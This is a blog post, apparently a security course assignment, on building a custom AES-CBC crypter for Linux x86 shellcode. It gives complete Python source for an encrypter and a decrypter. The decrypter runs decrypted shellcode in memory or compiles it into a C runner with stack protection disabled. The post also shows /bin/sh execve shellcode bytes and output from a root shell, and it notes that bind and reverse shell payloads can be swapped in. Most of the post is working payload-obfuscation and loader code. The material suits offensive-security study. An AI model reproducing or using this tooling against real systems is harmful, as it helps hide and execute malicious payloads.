Overview<\/h2>\n\n\n\n
A crypter is a piece of code which can be used to encrypt a file, executable or shellcode buffer. Although this blog series mainly focuses on writing assembly code, powerful crypto techniques such as RC4 and AES require a lot of assembly code, so we instead opt to go about writing a custom crypter in a higher level language, such as Python.<\/p>\n\n\n\n
In this blog post, we have implemented a custom AES crypter using the AES-CBC mode implementation provided in the PyCrypto<\/a> module. To begin, we briefly cover AES basics, and look at some simple examples on how we can encrypt and decrypt using AES and the PyCrypto library.<\/p>\n\n\n\n We briefly cover how AES encryption is performed below, covering the key usage, initialisation vector generation and how to encrypt and decrypt a simple message.<\/p>\n\n\n\n AES, or advanced encryption standard<\/strong> is a symmetric cipher which is considered to be the current industry standard for encryption as of the time this post was written. The encryption process is relatively easy to understand, straight forward to implement, and offers fast encryption and decryption times.<\/p>\n\n\n\n There are three types of key lengths of AES encryption keys:<\/p>\n\n\n\n In this blog post, we will be using a key length of 128-bits (16 bytes).<\/p>\n\n\n\n AES encryption requires a strong 16 byte key. Generally, the stronger the key, the stronger the encryption, so it is best to use a key with sufficient entropy.<\/p>\n\n\n\n To show how we can perform encryption and decryption using Python, for demonstration purposes we will use a simple key value of 'pentesteracademy'.<\/p>\n\n\n\n As we are using AES in Cipher Block Chaining (CBC) mode, we need to specify an initialisation vector (IV). In this mode, the plaintext is divided into equal-sized blocks, each of which are equal to the key length (16 bytes) in size, with additional padding for the final block where needed.<\/p>\n\n\n\n The purpose of the IV is to produce different encrypted data each time the encryption routine is run, so that an attacker cannot easily compare encrypted blocks and use cryptanalysis to determine message contents. As such, the IV is usually a randomly seeded 16-byte value.<\/p>\n\n\n\n The below image<\/a> structures how the CBC mode works.<\/p>\n\n\n\n <\/p>\n\n\n\n The initialisation vector needs to be transmitted to the receiver for decryption, but doesn't need to be encrypted. Usually this is handled by packing it into the first 16 bytes of the encrypted shellcode buffer.<\/p>\n\n\n\n The below python code sets up our static key, 16-byte initialisation vector, and the plaintext message we want to encrypt. In our custom crypter implementation, the IV is randomly generated as per security best practices.<\/p>\n\n\n We now have everything we need to perform basic encryption with AES. In the case of our simple example, our plaintext buffer 'hello world 1234' is exactly 16-bytes long. As a result, we do not need to pad it.<\/p>\n\n\n\n We prepend the IV value to the encrypted buffer, so that the decryption routine can extract it and use it to decrypt the buffer.<\/p>\n\n\n To decrypt, we need to supply the key that the data was originally encrypted with. This key needs to be sent to the receiver via a secure channel so as to avoid compromising the confidentiality of the message.<\/p>\n\n\n\n In addition to the key, the receiver also needs the initialisation vector. As covered previously, this value was prepended to the encrypted shellcode buffer as the first 16-bytes. As such, the receiver can simply extract the IV as it is sent unencrypted.<\/p>\n\n\n\n Below, we demonstrate how the previous encrypted shellcode can be simply decrypted. When printing the decrypted message, we cut the first 16 bytes to just return the original message without the prepended IV.<\/p>\n\n\n Next, we cover our Python implementation of a custom AES shellcode crypter.<\/p>\n\n\n\n Our crypter works by simply applying AES encryption to a shellcode buffer using a given encryption key. Both the shellcode and encryption key are passed as command-line arguments to the script.<\/p>\n\n\n\n The usage instructions for the The crypter optionally takes a user provided 16-byte key, or randomly generates one using the gen_key function. This key is subsequently used to encrypt the shellcode.<\/p>\n\n\n After providing a plaintext payload, the script prints the shellcode length, number of padding bytes required, and the encryption key used. The encrypted shellcode buffer is also printed.<\/p>\n\n\n\n Using this script, it is possible to perform AES encryption on raw and encoded shellcode payloads. The script was tested using both XOR encoded and raw payloads to demonstrate how encoding and encryption methods can be chained.<\/p>\n\n\n\n The following example demonstrates how to encrypt a simple \/bin\/sh execve shellcode payload using a randomly generated encryption key:<\/p>\n\n\n The custom crypter script, To reverse the AES encryption routine, Note:<\/strong> The encryption key is displayed to the user following the encryption routine run using The usage instructions for the As with the In addition, the user must supply an action<\/strong> for the script to perform, out of a choice of compile<\/strong> or run<\/strong>.<\/p>\n\n\n\n The compile<\/strong> action takes the shellcode buffer following the decryption routine, inserts it into a C<\/strong> skeleton program at the SHELLCODE<\/strong> marker, and compiles it into a binary. When executed, the program will run the decrypted shellcode buffer.<\/p>\n\n\n\n See below the C skeleton program:<\/p>\n\n\n The run<\/strong> action instead takes the decrypted shellcode buffer and executes it directly in memory.<\/p>\n\n\n\n The custom decrypter script, Next, we demonstrate how the crypter and decrypter scripts can be used to perform AES encryption on a simple \/bin\/sh<\/strong> shellcode payload.<\/p>\n\n\n\n To begin, the <\/p>\n\n\n\n Next, the user takes note of the encryption key and the encrypted shellcode buffer which was previously printed to the screen, and supplies them as arguments to the Below, we demonstrate this along with the run<\/strong> action to execute the shellcode directly in memory.<\/p>\n\n\n <\/p>\n\n\n\n Similarly, the compile<\/strong> option can be chosen, which generates a shellcode binary.<\/p>\n\n\n Upon entering an incorrect password, the script displays an error and exits as follows:<\/p>\n\n\n <\/p>\n\n\n\n Above we have performed testing using a simple \/bin\/sh<\/strong> example, our custom crypter is also compatible with other payloads, such as a bind<\/strong> or reverse<\/strong> shell.<\/p>\n\n\n\n Bind shell:<\/p>\n\n\n\n <\/p>\n\n\n\n Reverse shell:<\/p>\n\n\n\n <\/p>\n\n\n\n This concludes our analysis on our custom crypter. In place of executing \/bin\/sh<\/strong>, the payload can be flexibly replaced with a TCP bind<\/strong> or reverse<\/strong> shell as demonstrated above. More information on our implementations of this can be found in blog posts 1 & 2 in this series.<\/p>\n\n\n\n The Python and C source code for my custom crypter implementation can be found on my GitHub repository<\/a>.<\/p>\n\n\n\n
\n\n\n\nWorking with AES<\/h3>\n\n\n\n
\n
Key Generation<\/h4>\n\n\n\n
Initialisation Vector<\/h4>\n\n\n\n
![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220515083912.png\")
<\/figure>\n\n\n\n\n>>> from Crypto.Cipher import AES\n\n>>> key = 'pentesteracademy'\n\n>>> iv = bytes('IVIVIVIVIVI12345', encoding='utf-8')\n\n>>> message = 'hello world 1234'\n<\/pre><\/div>\n\n\nAES Encryption<\/h4>\n\n\n\n
\n>>> from Crypto.Cipher import AES\n\n>>> key = 'pentesteracademy'\n\n>>> iv = bytes('IVIVIVIVIVI12345', encoding='utf-8')\n\n>>> message = 'hello world 1234'\n\n>>> aes = AES.new(key, AES.MODE_CBC, iv)\n\n>>> encrypted = iv + aes.encrypt(message)\n<\/pre><\/div>\n\n\nAES Decryption<\/h4>\n\n\n\n
\n>>> print(encrypted)\nb'IVIVIVIVIVI12345\\x97\\xcez\\x0c\\x05,#\\xda\\xe8\\xean-?\/\\xe7h'\n\ndecrypted = aes.decrypt(encrypted)\n\n>>> print(decrypted)\nb'J\\x0f\\xe0O\\xe6\\xd4\\xe8\\xd6$\\x91=M\\xc5D\\r\\x06hello world 1234'\n\n>>> print(decrypted[16:])\nb'hello world 1234'\n<\/pre><\/div>\n\n\n
\n\n\n\nCustom Crypter<\/h3>\n\n\n\n
custom_crypter.py<\/code> script are as follows:<\/p>\n\n\n\nusage: custom_crypter.py [-h] [-k KEY] [-p PAYLOAD]\n\nCustom Linux x86 shellcode crypter using AES-CBC\n\noptional arguments:\n -h, --help show this help message and exit\n -k KEY, --key KEY 16-byte encryption key to encrypt the shellcode payload\n -p PAYLOAD, --payload PAYLOAD\n Shellcode payload to encrypt\n<\/pre><\/div>\n\n\n
\ndef gen_key():\n # Generate randomised key\n key = ''.join(random.choices(string.ascii_letters + string.digits, k=16))\n return key\n<\/pre><\/div>\n\n\n
\npython3 custom_crypter.py -p "\\x31\\xc9\\xf7\\xe1\\xb0\\x0b\\x51\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\xcd\\x80"\n\n[*] Shellcode length: 21 bytes (+ 11 bytes padding)\n\n[*] Key: RN6cNsDqmSfXCc1s\n\n[*] Plaintext Shellcode: "\\x31\\xc9\\xf7\\xe1\\xb0\\x0b\\x51\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\xcd\\x80"\n\n[+] Encrypted Shellcode: "\\x38\\x77\\x30\\x50\\x46\\x50\\x44\\x45\\x4b\\x5a\\x74\\x70\\x38\\x34\\x36\\x4c\\x95\\x77\\xb9\\x38\\x98\\x4d\\x85\\x6f\\xae\\x10\\x19\\x69\\x55\\xa6\\xa1\\x97\\x17\\x1e\\xf3\\x89\\x06\\x20\\xf6\\xfc\\xce\\xf8\\x67\\xb9\\x52\\x51\\x80\\x01\\x33\\x61\\x84\\x32\\x3d\\xe8\\xf2\\x61\\x52\\xa7\\xc7\\x97\\x63\\x6c\\x2d\\x48\\xad\\x8b\\x07\\xf0\\xad\\xfc\\xd1\\x18\\xd5\\x05\\x63\\x33\\x20\\xe1\\xd8\\xa6\\xc5\\x64\\x58\\xef\\xb4\\x1e\\x9a\\x2a\\xd1\\x3b\\x1b\\x23\\x06\\x95\\x2d\\x01\\x8d\\x87\\x17\\xbf\\x49\\xaf\\x94\\x02\\x7b\\x62\\xac\\xc8\\xfe\\xde\\x95\\xc6\\x9c\\x49\\x85\\x7d\\x9a\\x32\\xe7\\x8f\\xd8\\xcc\\xcc\\x1c\\x2c\\x9f\\xf0\\xb9\\xbe\\xb0\\x5b\\x0b\\x4a\\x30\\x02\\x0f\\x0e\\xf0\\x65\\x07\\xf4\\x0d\\x74\\x02"\n<\/pre><\/div>\n\n\n
custom_crypter.py<\/code> is written as follows:<\/p>\n\n\n\n#!\/usr\/bin\/python3\nfrom Crypto.Cipher import AES\nimport argparse\nimport random, string\nimport sys\n\ndef encrypt(key, shellcode):\n # Initialisation vector\n iv = ''.join(random.choices(string.ascii_letters + string.digits, k=16))\n iv = bytes(iv, encoding='utf-8')\n\n # Set up AES CBC encryption scheme using key and iv\n aes = AES.new(key, AES.MODE_CBC, iv)\n\n # Calculate number of padding bytes needed\n l = len(shellcode)\n r = l % 16\n offset = 16 - r\n\n print('\\n[*] Shellcode length: %d bytes (+ %d bytes padding)' % (l,offset))\n\n print('\\n[*] Key: %s' % key)\n\n plain_sc = ''\n for i in bytearray(shellcode):\n plain_sc += '\\\\x%02x' % i\n\n print('\\n[*] Plaintext Shellcode: "%s"' % plain_sc)\n\n # Pad shellcode with 'A' characters till size is divisible by 16\n while len(shellcode) % 16 != 0:\n shellcode = shellcode + bytes("A", encoding='utf-8')\n\n plain_sc = ''\n for i in bytearray(shellcode):\n plain_sc += '\\\\x%02x' % i\n\n # Encrypt shellcode with IV prepended\n sc = iv + aes.encrypt(plain_sc)\n\n encrypted = ''\n for i in bytearray(sc):\n encrypted += '\\\\x%02x' % i\n\n return encrypted\n\ndef gen_key():\n # Generate randomised 16-byte key\n key = ''.join(random.choices(string.ascii_letters + string.digits, k=16))\n return key\n\ndef main():\n # Process arguments\n parser = argparse.ArgumentParser(description='Custom Linux x86 shellcode crypter using AES-CBC')\n parser.add_argument('-k', '--key', type=str, help='16-byte encryption key to encrypt the shellcode payload', default=gen_key())\n parser.add_argument('-p', '--payload', type=str, help='Shellcode payload to encrypt')\n args = parser.parse_args()\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit()\n\n # Convert string shellcode into byte array\n shellcode = args.payload\n shellcode = shellcode.replace('\\\\x', '')\n shellcode = bytes.fromhex(shellcode)\n\n if len(args.key) % 16 != 0:\n print("[-] Key must be 16 bytes long. Exiting.")\n sys.exit(1)\n\n # Encrypt and print the shellcode\n encrypted = encrypt(args.key, shellcode)\n print('\\n[+] Encrypted Shellcode: "%s"\\n' % encrypted)\n\nif __name__ == "__main__":\n main()\n<\/pre><\/div>\n\n\n
\n\n\n\nCustom Decrypter<\/h3>\n\n\n\n
custom_decrypter.py<\/code> was written. This script works by simply processing the AES decryption key and encrypted shellcode from the user, extracting the IV from the initial 16-bytes of shellcode and performing the decryption routine.<\/p>\n\n\n\ncustom_crypter.py<\/code>, so it is at the discretion of the user to choose how to transmit it to the receiver for decryption purposes.<\/p>\n\n\n\ncustom_decrypter.py<\/code> script are as follows:<\/p>\n\n\n\nusage: custom_decrypter.py [-h] [-k KEY] [-p PAYLOAD] [-a {compile,run}] [-s]\n\nCustom Linux x86 shellcode decrypter using AES-CBC\n\noptional arguments:\n -h, --help show this help message and exit\n -k KEY, --key KEY 16-byte decryption key to decrypt the shellcode payload\n -p PAYLOAD, --payload PAYLOAD\n Shellcode payload to decrypt\n -a {compile,run}, --action {compile,run}\n Choose to compile or execute the decrypted shellcode in memory\n -s, --shellcode Output shellcode only\n<\/pre><\/div>\n\n\ncustom_crypter.py<\/code> implementation, the user may supply an encrypted shellcode buffer as well as key used to perform encryption. As AES is a symmetric<\/strong> cipher, the encryption key is also used to perform decryption.<\/p>\n\n\n\n\n#include<stdio.h>\n#include<string.h>\n\nunsigned char code[] = \\\n"SHELLCODE";\n\nint main()\n{\n\n printf("Shellcode Length: %d\\n", strlen(code));\n\n int (*ret)() = (int(*)())code;\n\n ret();\n\n}\n<\/pre><\/div>\n\n\ncustom_decrypter.py<\/code> is written as follows:<\/p>\n\n\n\n#!\/usr\/bin\/python3\nfrom Crypto.Cipher import AES\nimport os\nimport sys\nimport argparse\nfrom ctypes import *\n\ndef decrypt(key, shellcode):\n # Obtain iv from first 16 bytes of ciphertext\n iv = shellcode[0:16].decode('utf-8')\n\n # Set up AES for decryption routine\n aes = AES.new(key, AES.MODE_CBC, iv)\n\n cipher = ""\n for i in bytearray(shellcode):\n cipher += '\\\\x%02x' % i\n\n # Decrypt shellcode\n plain = aes.decrypt(bytes(shellcode))\n\n try:\n plaintext = plain[16:].decode('utf-8')\n except:\n print('\\n[-] Incorrect decryption key provided. Exiting.')\n sys.exit(1)\n\n return plaintext\n\ndef compile_sc(shellcode):\n print('\\n[*] Compiling shellcode runner...')\n shellcode_file = open("shellcode.c", "rt")\n data = shellcode_file.read()\n data = data.replace("SHELLCODE", shellcode)\n\n shellcode_file.close()\n shellcode_file = open("tmp.c", "wt")\n shellcode_file.write(data)\n shellcode_file.close()\n\n os.system('gcc -fno-stack-protector -z execstack tmp.c -o shellcode')\n\n print('\\n[+] Shellcode compiled. Execute .\/shellcode to run') \n\ndef run_sc(shellcode_decrypted):\n print('\\n[*] Executing decrypted shellcode in memory...')\n # Do all the memory allocation stuff\n shellcode_decrypted = shellcode_decrypted.replace('\\\\x', '')\n shellcode_decrypted = bytes.fromhex(shellcode_decrypted)\n\n shellcode = create_string_buffer(shellcode_decrypted)\n run = cast(shellcode, CFUNCTYPE(None))\n\n libc = CDLL('libc.so.6')\n pagesize = libc.getpagesize()\n address = cast(run, c_void_p).value\n address_page = (address \/\/ pagesize) * pagesize\n\n for page_start in range(address_page, address+len(shellcode_decrypted), pagesize):\n assert libc.mprotect(page_start, pagesize, 0x7) == 0\n run()\n\ndef cleanup():\n # Remove any files created following compilation\n print('\\n[*] Performing cleanup!')\n os.system('rm tmp*')\n\ndef main():\n # Process arguments\n parser = argparse.ArgumentParser(description='Custom Linux x86 shellcode decrypter using AES-CBC')\n action_choices = ['compile', 'run']\n parser.add_argument('-k', '--key', type=str, help='16-byte decryption key to decrypt the shellcode payload')\n parser.add_argument('-p', '--payload', type=str, help='Shellcode payload to decrypt')\n parser.add_argument('-a', '--action', type=str, help='Choose to compile or execute the decrypted shellcode in memory', choices=action_choices)\n parser.add_argument('-s', '--shellcode', help='Output shellcode only', action='store_true')\n args = parser.parse_args()\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit()\n\n # Convert encrypted string shellcode into byte array\n shellcode = args.payload\n shellcode = shellcode.replace('\\\\x', '')\n shellcode = bytes.fromhex(shellcode)\n\n # Decrypt and print the shellcode\n decrypted = decrypt(args.key, shellcode)\n print('\\n[+] Decrypted Shellcode: "%s"\\n' % decrypted)\n\n # Based on command-line arguments, either compile the shellcode\n # Into an executable, or run it in memory\n if args.action == 'compile':\n compile_sc(decrypted)\n elif args.action == 'run':\n run_sc(decrypted)\n\n # Perform cleanup of leftover files\n cleanup()\n print('\\n[*] Exiting.')\n\nif __name__ == "__main__":\n main()\n<\/pre><\/div>\n\n\n
\n\n\n\nExample Usage<\/h2>\n\n\n\n
custom_crypter.py<\/code> script is used to encrypt the user-supplied payload:<\/p>\n\n\n\npython3 custom_crypter.py -p "\\x31\\xc9\\xf7\\xe1\\xb0\\x0b\\x51\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\xcd\\x80"\n\n[*] Shellcode length: 21 bytes (+ 11 bytes padding)\n\n[*] Key: fvt2tdG57y8Ru6Kj\n\n[*] Plaintext Shellcode: "\\x31\\xc9\\xf7\\xe1\\xb0\\x0b\\x51\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\xcd\\x80"\n\n[+] Encrypted Shellcode: "\\x37\\x6a\\x76\\x30\\x42\\x34\\x6a\\x58\\x48\\x77\\x56\\x45\\x44\\x70\\x44\\x50\\x45\\x8e\\xd2\\x0d\\x42\\xba\\xce\\xca\\x6a\\x97\\x74\\x28\\x43\\xa2\\x30\\x71\\x06\\x34\\x6e\\xdf\\x91\\xec\\xa5\\x2b\\x23\\xa5\\xaa\\xcf\\xe6\\x63\\xa7\\x5f\\x91\\xde\\x9a\\xde\\x2a\\x28\\x62\\x53\\x26\\x2b\\xd1\\x59\\xca\\x58\\xdf\\x32\\x75\\xa6\\x3f\\xdb\\x62\\xe8\\x04\\x8e\\x51\\xee\\xf4\\xdd\\xb5\\x63\\x1c\\xff\\x00\\x28\\xb9\\xdd\\x5b\\xc7\\x01\\xf5\\xf0\\x4a\\xb6\\x6c\\x9d\\x64\\xf3\\x36\\x12\\x7e\\xf4\\xe4\\x08\\x51\\x03\\x6e\\x52\\x3f\\xd0\\x1c\\x01\\xf2\\xd6\\x72\\x19\\xc2\\x98\\x98\\xd5\\x6a\\x6f\\xfe\\xf1\\xf2\\x4d\\xd4\\xda\\xd8\\xb4\\xee\\x91\\x52\\xf8\\x09\\xd4\\xdb\\x0c\\xa2\\x7c\\xe8\\x6e\\x4b\\x73\\x14\\x6d\\xac"\n<\/pre><\/div>\n\n\n
![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220515163930.png\")
<\/figure>\n\n\n\ncustom_decrypter.py<\/code> script.<\/p>\n\n\n\n\npython3 custom_decrypter.py -k fvt2tdG57y8Ru6Kj -p "\\x37\\x6a\\x76\\x30\\x42\\x34\\x6a\\x58\\x48\\x77\\x56\\x45\\x44\\x70\\x44\\x50\\x45\\x8e\\xd2\\x0d\\x42\\xba\\xce\\xca\\x6a\\x97\\x74\\x28\\x43\\xa2\\x30\\x71\\x06\\x34\\x6e\\xdf\\x91\\xec\\xa5\\x2b\\x23\\xa5\\xaa\\xcf\\xe6\\x63\\xa7\\x5f\\x91\\xde\\x9a\\xde\\x2a\\x28\\x62\\x53\\x26\\x2b\\xd1\\x59\\xca\\x58\\xdf\\x32\\x75\\xa6\\x3f\\xdb\\x62\\xe8\\x04\\x8e\\x51\\xee\\xf4\\xdd\\xb5\\x63\\x1c\\xff\\x00\\x28\\xb9\\xdd\\x5b\\xc7\\x01\\xf5\\xf0\\x4a\\xb6\\x6c\\x9d\\x64\\xf3\\x36\\x12\\x7e\\xf4\\xe4\\x08\\x51\\x03\\x6e\\x52\\x3f\\xd0\\x1c\\x01\\xf2\\xd6\\x72\\x19\\xc2\\x98\\x98\\xd5\\x6a\\x6f\\xfe\\xf1\\xf2\\x4d\\xd4\\xda\\xd8\\xb4\\xee\\x91\\x52\\xf8\\x09\\xd4\\xdb\\x0c\\xa2\\x7c\\xe8\\x6e\\x4b\\x73\\x14\\x6d\\xac" -a run\n\n[+] Decrypted Shellcode: "\\x31\\xc9\\xf7\\xe1\\xb0\\x0b\\x51\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\xcd\\x80\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41"\n\n[*] Executing decrypted shellcode in memory...\n# hostname\nkali\n# whoami\nroot\n# id\nuid=0(root) gid=0(root) groups=0(root)\n#\n<\/pre><\/div>\n\n\n
![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220515164153.png\")
<\/figure>\n\n\n\n\npython3 custom_decrypter.py -k fvt2tdG57y8Ru6Kj -p "\\x37\\x6a\\x76\\x30\\x42\\x34\\x6a\\x58\\x48\\x77\\x56\\x45\\x44\\x70\\x44\\x50\\x45\\x8e\\xd2\\x0d\\x42\\xba\\xce\\xca\\x6a\\x97\\x74\\x28\\x43\\xa2\\x30\\x71\\x06\\x34\\x6e\\xdf\\x91\\xec\\xa5\\x2b\\x23\\xa5\\xaa\\xcf\\xe6\\x63\\xa7\\x5f\\x91\\xde\\x9a\\xde\\x2a\\x28\\x62\\x53\\x26\\x2b\\xd1\\x59\\xca\\x58\\xdf\\x32\\x75\\xa6\\x3f\\xdb\\x62\\xe8\\x04\\x8e\\x51\\xee\\xf4\\xdd\\xb5\\x63\\x1c\\xff\\x00\\x28\\xb9\\xdd\\x5b\\xc7\\x01\\xf5\\xf0\\x4a\\xb6\\x6c\\x9d\\x64\\xf3\\x36\\x12\\x7e\\xf4\\xe4\\x08\\x51\\x03\\x6e\\x52\\x3f\\xd0\\x1c\\x01\\xf2\\xd6\\x72\\x19\\xc2\\x98\\x98\\xd5\\x6a\\x6f\\xfe\\xf1\\xf2\\x4d\\xd4\\xda\\xd8\\xb4\\xee\\x91\\x52\\xf8\\x09\\xd4\\xdb\\x0c\\xa2\\x7c\\xe8\\x6e\\x4b\\x73\\x14\\x6d\\xac" -a compile\n\n[+] Decrypted Shellcode: "\\x31\\xc9\\xf7\\xe1\\xb0\\x0b\\x51\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\xcd\\x80\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41"\n\n[*] Compiling shellcode runner...\n\n[+] Shellcode compiled. Execute .\/shellcode to run\n\n[*] Performing cleanup!\n\n[*] Exiting.\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/jack\/SLAE32\/Assignment 7: Custom Crypter]\n\u2514\u2500# .\/shellcode \nShellcode Length: 32\n# hostname\nkali\n# whoami\nroot\n# id\nuid=0(root) gid=0(root) groups=0(root)\n#\n<\/pre><\/div>\n\n\n
\npython3 custom_decrypter.py -k pentesteracademy -p "\\x37\\x6a\\x76\\x30\\x42\\x34\\x6a\\x58\\x48\\x77\\x56\\x45\\x44\\x70\\x44\\x50\\x45\\x8e\\xd2\\x0d\\x42\\xba\\xce\\xca\\x6a\\x97\\x74\\x28\\x43\\xa2\\x30\\x71\\x06\\x34\\x6e\\xdf\\x91\\xec\\xa5\\x2b\\x23\\xa5\\xaa\\xcf\\xe6\\x63\\xa7\\x5f\\x91\\xde\\x9a\\xde\\x2a\\x28\\x62\\x53\\x26\\x2b\\xd1\\x59\\xca\\x58\\xdf\\x32\\x75\\xa6\\x3f\\xdb\\x62\\xe8\\x04\\x8e\\x51\\xee\\xf4\\xdd\\xb5\\x63\\x1c\\xff\\x00\\x28\\xb9\\xdd\\x5b\\xc7\\x01\\xf5\\xf0\\x4a\\xb6\\x6c\\x9d\\x64\\xf3\\x36\\x12\\x7e\\xf4\\xe4\\x08\\x51\\x03\\x6e\\x52\\x3f\\xd0\\x1c\\x01\\xf2\\xd6\\x72\\x19\\xc2\\x98\\x98\\xd5\\x6a\\x6f\\xfe\\xf1\\xf2\\x4d\\xd4\\xda\\xd8\\xb4\\xee\\x91\\x52\\xf8\\x09\\xd4\\xdb\\x0c\\xa2\\x7c\\xe8\\x6e\\x4b\\x73\\x14\\x6d\\xac" -a compile\n\n[-] Incorrect decryption key provided. Exiting.\n<\/pre><\/div>\n\n\n
![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220515164458.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220515173540.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220515173823.png\")
<\/figure>\n\n\n\n
\n\n\n\n
\n\n\n\nCode<\/h3>\n\n\n\n
\n\n\n\n